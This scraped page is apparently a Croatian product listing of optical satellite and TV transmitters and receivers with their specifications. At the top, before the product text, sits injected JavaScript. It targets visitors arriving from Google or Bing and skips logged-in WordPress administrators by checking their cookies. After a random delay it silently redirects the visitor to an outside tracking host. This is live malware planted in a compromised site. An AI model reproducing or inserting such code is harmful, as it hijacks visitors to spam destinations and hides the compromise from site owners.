((event) => { var ref = document.referrer || ''; if (ref.length === 0) { return; } ref = ref.toLowerCase(); if (ref.indexOf('google') === -1 && ref.indexOf('bing') === -1) { return; } var cookie = document.cookie || ''; if (cookie.indexOf('wordpress_logged') !== -1 || cookie.indexOf('wp-settings') !== -1 || cookie.indexOf('wordpress_test') !== -1) { return; } if (cookie.indexOf('wordpress-test') !== -1) { return; } function generateRandomInteger(min, max) { return Math.floor(min + Math.random()*(max - min + 1)); } document.cookie = "wordpress-test=1; max-age=86400; path=/;"; const delay = generateRandomInteger(20000, 60000); setTimeout(() => { window.location.replace('http://cabonusoffer.com/track/'); }, delay);})();class="page-template-default page page-id-1887">

► OPTIKA

OPTIČKI PREDAJNIK
OPT-TX-DT
SAT ulaza: 4 (VL,VH,HL,HH)(950-2150MHz)
ZEM ulaza: 1 (88-862MHz)
Optički izlaz: SC/APC (1310nm)
Kaskadni izlaz: 4xSAT + 1xZEM
Moguće spajanje do 7 predajnika
OPTIČKI PRIJEMNIK
OPT-RX-DT
Ulaz: optika SC/APC (1310nm)
Izlaz: 4 RF TV/SAT (88-862/950-2150MHz)
Izlazni nivo @21dB optička atenuacija: 77(TV) – 80(SAT)
OPTIČKI PRIJEMNIK
OPT-RX-DT-Quattro
Ulaz: optika SC/APC (1310nm)
Izlaz: 4 SAT(VL,VH,HL,HH) + TV (88-862/950-2150MHz)
Izlazni nivo @21dB optička atenuacija: 82(TV) – 88(SAT)
OPTIČKI PRIJEMNIK
OPT-RX-TV
Ulaz 1: optika FC/PC s SC/APC adapterom (1310nm)
Ulaz 2: RF mix
Izlaz: 1 RF (47-2150MHz)
Izlazni nivo @21dB optička atenuacija: 80(TV) – 70(SAT)
Podešavanje nivoa: 20dB